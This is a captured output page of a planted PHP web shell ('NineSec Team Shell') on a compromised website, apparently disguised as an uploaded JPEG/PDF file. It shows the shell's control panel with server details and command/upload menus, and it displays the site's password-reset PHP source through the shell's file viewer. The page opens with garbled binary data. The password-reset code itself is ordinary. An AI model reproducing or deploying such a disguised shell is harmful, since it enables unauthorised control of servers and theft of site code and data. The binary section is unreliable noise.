JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/../forget_password.php
<?php
require_once 'config/database.php';

// Simple sanitization function
function cleanInput($data) {
    return htmlspecialchars(strip_tags(trim($data)));
}

// Email sending function for password reset
function sendPasswordResetEmail($to, $token) {
    $reset_link = "https://princess.uaeclick.com/reset_password.php?token=" . urlencode($token);
    
    $subject = "Password Reset Request - Princess Asie K Ocansey";
    
    $message = "
    <html>
    <head>
        <title>Password Reset Request</title>
        <style>
            body { font-family: Arial, sans-serif; line-height: 1.6; color: #333; }
            .container { max-width: 600px; margin: 0 auto; padding: 20px; }
            .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 30px; text-align: center; border-radius: 10px 10px 0 0; }
            .content { background: #f9f9f9; padding: 30px; }
            .footer { background: #333; color: white; padding: 20px; text-align: center; border-radius: 0 0 10px 10px; }
            .button { display: inline-block; padding: 12px 30px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; text-decoration: none; border-radius: 5px; font-weight: bold; }
            .button:hover { background: linear-gradient(135deg, #764ba2 0%, #667eea 100%); }
            .warning { background: #fff3cd; color: #856404; padding: 10px; border-radius: 5px; margin: 15px 0; }
        </style>
    </head>
    <body>
        <div class='container'>
            <div class='header'>
                <h1>Password Reset Request</h1>
                <h2>Princess Asie K Ocansey</h2>
            </div>
            
            <div class='content'>
                <p>We received a request to reset your password for your account.</p>
                
                <div class='warning'>
                    <strong>Important:</strong> If you did not request this password reset, please ignore this email. Your account remains secure.
                </div>
                
                <p>To reset your password, please click the button below:</p>
                
                <div style='text-align: center; margin: 30px 0;'>
                    <a href='$reset_link' class='button'>Reset Your Password</a>
                </div>
                
                <p>Alternatively, you can copy and paste the following link in your browser:</p>
                <p style='word-break: break-all; background: #eee; padding: 10px; border-radius: 5px;'>
                    $reset_link
                </p>
                
                <p><strong>This password reset link will expire in 1 hour for security reasons.</strong></p>
                
                <p>For your security, we recommend:</p>
                <ul>
                    <li>Choosing a strong, unique password</li>
                    <li>Not sharing your password with anyone</li>
                    <li>Using a combination of letters, numbers, and special characters</li>
                </ul>
            </div>
            
            <div class='footer'>
                <p>With warm regards,<br>
                <strong>Princess Asie K Ocansey</strong><br>
                and the Entire Team</p>
                
                <p>Contact us: princess@princess.uaeclick.com</p>
                <p>Website: https://princess.uaeclick.com</p>
            </div>
        </div>
    </body>
    </html>
    ";
    
    $headers = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
    $headers .= "From: Princess Asie K Ocansey <princess@princess.uaeclick.com>" . "\r\n";
    $headers .= "Reply-To: princess@princess.uaeclick.com" . "\r\n";
    $headers .= "X-Mailer: PHP/" . phpversion();
    
    // Additional SMTP configuration for Hostinger
    ini_set("SMTP", "mail.hostinger.com");
    ini_set("smtp_port", "587");
    ini_set("sendmail_from", "princess@princess.uaeclick.com");
    
    return mail($to, $subject, $message, $headers);
}

$error = '';
$success = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email = isset($_POST['email']) ? cleanInput($_POST['email']) : '';
    
    if (empty($email)) {
        $error = 'Please enter your email address.';
    } else {
        // Check if email exists in users table
        $stmt = $pdo->prepare("SELECT id, first_name, last_name FROM users WHERE email = ?");
        $stmt->execute([$email]);
        $user = $stmt->fetch(PDO::FETCH_ASSOC);
        
        if ($user) {
            // Generate unique token
            $token = bin2hex(random_bytes(50));
            $expires_at = date('Y-m-d H:i:s', strtotime('+1 hour'));
            
            // Delete any existing tokens for this email
            $stmt = $pdo->prepare("DELETE FROM password_resets WHERE email = ?");
            $stmt->execute([$email]);
            
            // Insert new token
            $stmt = $pdo->prepare("INSERT INTO password_resets (email, token, expires_at) VALUES (?, ?, ?)");
            
            if ($stmt->execute([$email, $token, $expires_at])) {
                // Send password reset email
                if (sendPasswordResetEmail($email, $token)) {
                    $success = 'Password reset instructions have been sent to your email address. Please check your inbox (and spam folder).';
                } else {
                    $error = 'Failed to send email. Please try again.';
                }
            } else {
                $error = 'Error generating reset token. Please try again.';
            }
        } else {
            $error = 'No account found with that email address.';
        }
    }
}

include 'includes/header.php';
?>

<section class="section">
    <div class="container">
        <h2 class="section-title">Forgot Your Password?</h2>
        
        <div class="card" style="max-width: 500px; margin: 0 auto;">
            <?php if ($error): ?>
                <div style="background-color: #ffebee; color: #c62828; padding: 10px; border-radius: 5px; margin-bottom: 20px;">
                    <?php echo $error; ?>
                </div>
            <?php endif; ?>
            
            <?php if ($success): ?>
                <div style="background-color: #e8f5e9; color: #2e7d32; padding: 10px; border-radius: 5px; margin-bottom: 20px;">
                    <?php echo $success; ?>
                </div>
            <?php endif; ?>
            
            <form method="POST" action="">
                <div class="form-group">
                    <label for="email">Enter your email address</label>
                    <input type="email" id="email" name="email" required value="<?php echo isset($_POST['email']) ? htmlspecialchars($_POST['email']) : ''; ?>">
                    <small>We'll send you a link to reset your password.</small>
                </div>
                
                <button type="submit" class="btn btn-primary" style="width: 100%;">Send Reset Link</button>
                
                <div style="text-align: center; margin-top: 20px;">
                    <a href="login.php">Back to Login</a>
                </div>
            </form>
        </div>
    </div>
</section>

<?php include 'includes/footer.php'; ?>

NineSec Team - 2022